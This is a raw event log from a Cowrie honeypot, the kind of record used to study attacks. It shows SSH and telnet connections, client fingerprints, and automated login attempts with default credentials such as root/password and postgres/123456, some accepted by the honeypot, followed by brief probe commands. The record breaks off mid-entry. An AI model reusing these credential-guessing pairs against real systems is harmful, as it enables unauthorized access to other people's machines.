{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-09-08T18:11:09.998754Z","src_ip":"172.104.11.46","session":"aa19a8cd0477"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59028,"dst_ip":"1.2.3.4","dst_port":23,"session":"efb16dce5f29","protocol":"telnet","message":"New connection: 212.227.235.229:59028 (1.2.3.4:23) [session: efb16dce5f29]","sensor":"my-vps","timestamp":"2025-09-08T18:11:11.484084Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-09-08T18:11:11.681755Z","src_ip":"212.227.235.229","session":"efb16dce5f29"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T18:11:11.736788Z","src_ip":"212.227.235.229","session":"efb16dce5f29"}
{"eventid":"cowrie.command.input","input":"1","message":"CMD: 1","sensor":"my-vps","timestamp":"2025-09-08T18:11:11.737914Z","src_ip":"212.227.235.229","session":"efb16dce5f29"}
{"eventid":"cowrie.command.failed","input":"1","message":"Command not found: 1","sensor":"my-vps","timestamp":"2025-09-08T18:11:11.738691Z","src_ip":"212.227.235.229","session":"efb16dce5f29"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:11:11.740142Z","src_ip":"172.104.11.46","session":"aa19a8cd0477"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41889,"dst_ip":"1.2.3.4","dst_port":23,"session":"31b1e5ac4faa","protocol":"telnet","message":"New connection: 212.227.125.160:41889 (1.2.3.4:23) [session: 31b1e5ac4faa]","sensor":"my-vps","timestamp":"2025-09-08T18:11:24.041099Z"}
{"eventid":"cowrie.session.closed","duration":31.345499515533447,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:11:55.386484Z","src_ip":"212.227.125.160","session":"31b1e5ac4faa"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.157.139","src_port":37348,"dst_ip":"1.2.3.4","dst_port":22,"session":"e8fc4aa6cfc9","protocol":"ssh","message":"New connection: 170.64.157.139:37348 (1.2.3.4:22) [session: e8fc4aa6cfc9]","sensor":"my-vps","timestamp":"2025-09-08T18:12:04.129557Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T18:12:04.189807Z","src_ip":"170.64.157.139","session":"e8fc4aa6cfc9"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T18:12:04.392299Z","src_ip":"170.64.157.139","session":"e8fc4aa6cfc9"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"mysql","message":"login attempt [mysql/mysql] failed","sensor":"my-vps","timestamp":"2025-09-08T18:12:05.447227Z","src_ip":"170.64.157.139","session":"e8fc4aa6cfc9"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:12:06.713255Z","src_ip":"170.64.157.139","session":"e8fc4aa6cfc9"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.157.139","src_port":55754,"dst_ip":"1.2.3.4","dst_port":22,"session":"d01bb0a3e6e1","protocol":"ssh","message":"New connection: 170.64.157.139:55754 (1.2.3.4:22) [session: d01bb0a3e6e1]","sensor":"my-vps","timestamp":"2025-09-08T18:13:15.541267Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T18:13:15.640077Z","src_ip":"170.64.157.139","session":"d01bb0a3e6e1"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T18:13:15.795166Z","src_ip":"170.64.157.139","session":"d01bb0a3e6e1"}
{"eventid":"cowrie.login.failed","username":"apache","password":"apache","message":"login attempt [apache/apache] failed","sensor":"my-vps","timestamp":"2025-09-08T18:13:16.817383Z","src_ip":"170.64.157.139","session":"d01bb0a3e6e1"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:13:18.073065Z","src_ip":"170.64.157.139","session":"d01bb0a3e6e1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","size":524,"shasum":"4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:14:11.745982Z","src_ip":"212.227.235.229","session":"efb16dce5f29"}
{"eventid":"cowrie.session.closed","duration":180.26599287986755,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:14:11.750001Z","src_ip":"212.227.235.229","session":"efb16dce5f29"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.157.139","src_port":45148,"dst_ip":"1.2.3.4","dst_port":22,"session":"8abdb13adc34","protocol":"ssh","message":"New connection: 170.64.157.139:45148 (1.2.3.4:22) [session: 8abdb13adc34]","sensor":"my-vps","timestamp":"2025-09-08T18:14:27.621263Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T18:14:27.622195Z","src_ip":"170.64.157.139","session":"8abdb13adc34"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T18:14:27.919910Z","src_ip":"170.64.157.139","session":"8abdb13adc34"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"123456","message":"login attempt [postgres/123456] failed","sensor":"my-vps","timestamp":"2025-09-08T18:14:28.840083Z","src_ip":"170.64.157.139","session":"8abdb13adc34"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:14:30.150213Z","src_ip":"170.64.157.139","session":"8abdb13adc34"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.157.139","src_port":48050,"dst_ip":"1.2.3.4","dst_port":22,"session":"91bbf9be0a18","protocol":"ssh","message":"New connection: 170.64.157.139:48050 (1.2.3.4:22) [session: 91bbf9be0a18]","sensor":"my-vps","timestamp":"2025-09-08T18:15:44.278417Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T18:15:44.279125Z","src_ip":"170.64.157.139","session":"91bbf9be0a18"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T18:15:44.679165Z","src_ip":"170.64.157.139","session":"91bbf9be0a18"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"654321","message":"login attempt [postgres/654321] failed","sensor":"my-vps","timestamp":"2025-09-08T18:15:45.680618Z","src_ip":"170.64.157.139","session":"91bbf9be0a18"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:15:47.010028Z","src_ip":"170.64.157.139","session":"91bbf9be0a18"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60248,"dst_ip":"1.2.3.4","dst_port":23,"session":"c888183cb231","protocol":"telnet","message":"New connection: 212.227.235.229:60248 (1.2.3.4:23) [session: c888183cb231]","sensor":"my-vps","timestamp":"2025-09-08T18:16:12.027320Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-09-08T18:16:12.225720Z","src_ip":"212.227.235.229","session":"c888183cb231"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T18:16:12.244922Z","src_ip":"212.227.235.229","session":"c888183cb231"}
{"eventid":"cowrie.command.input","input":"1","message":"CMD: 1","sensor":"my-vps","timestamp":"2025-09-08T18:16:12.246081Z","src_ip":"212.227.235.229","session":"c888183cb231"}
{"eventid":"cowrie.command.failed","input":"1","message":"Command not found: 1","sensor":"my-vps","timestamp":"2025-09-08T18:16:12.247032Z","src_ip":"212.227.235.229","session":"c888183cb231"}
{"eventid":"cowrie.session.connect","src_ip":"79.124.8.120","src_port":57756,"dst_ip":"1.2.3.4","dst_port":23,"session":"6c5776f4bec1","protocol":"telnet","message":"New connection: 79.124.8.120:57756 (1.2.3.4:23) [session: 6c5776f4bec1]","sensor":"my-vps","timestamp":"2025-09-08T18:16:33.014532Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-09-08T18:16:33.054509Z","src_ip":"79.124.8.120","session":"6c5776f4bec1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T18:16:33.102754Z","src_ip":"79.124.8.120","session":"6c5776f4bec1"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":57540,"dst_ip":"1.2.3.4","dst_port":22,"session":"878abfefd88f","protocol":"ssh","message":"New connection: 217.72.205.35:57540 (1.2.3.4:22) [session: 878abfefd88f]","sensor":"my-vps","timestamp":"2025-09-08T18:16:38.104161Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:16:38.105350Z","src_ip":"217.72.205.35","session":"878abfefd88f"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.157.139","src_port":57096,"dst_ip":"1.2.3.4","dst_port":22,"session":"1d3f33ef5da6","protocol":"ssh","message":"New connection: 170.64.157.139:57096 (1.2.3.4:22) [session: 1d3f33ef5da6]","sensor":"my-vps","timestamp":"2025-09-08T18:17:01.655022Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T18:17:01.655821Z","src_ip":"170.64.157.139","session":"1d3f33ef5da6"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T18:17:01.917070Z","src_ip":"170.64.157.139","session":"1d3f33ef5da6"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"123","message":"login attempt [postgres/123] failed","sensor":"my-vps","timestamp":"2025-09-08T18:17:02.718430Z","src_ip":"170.64.157.139","session":"1d3f33ef5da6"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:17:04.002521Z","src_ip":"170.64.157.139","session":"1d3f33ef5da6"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.157.139","src_port":36504,"dst_ip":"1.2.3.4","dst_port":22,"session":"76ffc1426033","protocol":"ssh","message":"New connection: 170.64.157.139:36504 (1.2.3.4:22) [session: 76ffc1426033]","sensor":"my-vps","timestamp":"2025-09-08T18:18:16.598845Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T18:18:16.599782Z","src_ip":"170.64.157.139","session":"76ffc1426033"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T18:18:16.890178Z","src_ip":"170.64.157.139","session":"76ffc1426033"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"321","message":"login attempt [postgres/321] failed","sensor":"my-vps","timestamp":"2025-09-08T18:18:17.765938Z","src_ip":"170.64.157.139","session":"76ffc1426033"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:18:19.059691Z","src_ip":"170.64.157.139","session":"76ffc1426033"}
{"eventid":"cowrie.session.connect","src_ip":"8.138.136.155","src_port":51108,"dst_ip":"1.2.3.4","dst_port":22,"session":"63fa524c41d3","protocol":"ssh","message":"New connection: 8.138.136.155:51108 (1.2.3.4:22) [session: 63fa524c41d3]","sensor":"my-vps","timestamp":"2025-09-08T18:18:44.726686Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-makiko","message":"Remote SSH version: SSH-2.0-makiko","sensor":"my-vps","timestamp":"2025-09-08T18:18:44.727534Z","src_ip":"8.138.136.155","session":"63fa524c41d3"}
{"eventid":"cowrie.client.kex","hassh":"2f5ebb184f5d02324eed9a822f5259dc","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-cbc,aes192-cbc,aes256-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1-etm@openssh.com,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","rsa-sha2-256","rsa-sha2-512","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ssh-rsa"],"encCS":["chacha20-poly1305@openssh.com","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-cbc","aes192-cbc","aes256-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1-etm@openssh.com","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2f5ebb184f5d02324eed9a822f5259dc","sensor":"my-vps","timestamp":"2025-09-08T18:18:44.727976Z","src_ip":"8.138.136.155","session":"63fa524c41d3"}
{"eventid":"cowrie.login.failed","username":"root","password":"123456","message":"login attempt [root/123456] failed","sensor":"my-vps","timestamp":"2025-09-08T18:18:45.422101Z","src_ip":"8.138.136.155","session":"63fa524c41d3"}
{"eventid":"cowrie.login.success","username":"root","password":"password","message":"login attempt [root/password] succeeded","sensor":"my-vps","timestamp":"2025-09-08T18:18:46.641903Z","src_ip":"8.138.136.155","session":"63fa524c41d3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T18:18:47.157803Z","src_ip":"8.138.136.155","session":"63fa524c41d3"}
{"eventid":"cowrie.command.input","input":"cat /bin/echo","message":"CMD: cat /bin/echo","sensor":"my-vps","timestamp":"2025-09-08T18:18:47.159731Z","src_ip":"8.138.136.155","session":"63fa524c41d3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":27958,"dst_ip":"1.2.3.4","dst_port":22,"session":"8237ef2d581c","protocol":"ssh","message":"New connection: 212.227.235.229:27958 (1.2.3.4:22) [session: 8237ef2d581c]","sensor":"my-vps","timestamp":"2025-09-08T18:18:52.008381Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T18:18:52.009582Z","src_ip":"212.227.235.229","session":"8237ef2d581c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":28318,"dst_ip":"1.2.3.4","dst_port":22,"session":"deb9fc1e15ac","protocol":"ssh","message":"New connection: 212.227.235.229:28318 (1.2.3.4:22) [session: deb9fc1e15ac]","sensor":"my-vps","timestamp":"2025-09-08T18:18:52.167242Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T18:18:52.169360Z","src_ip":"212.227.235.229","session":"deb9fc1e15ac"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nis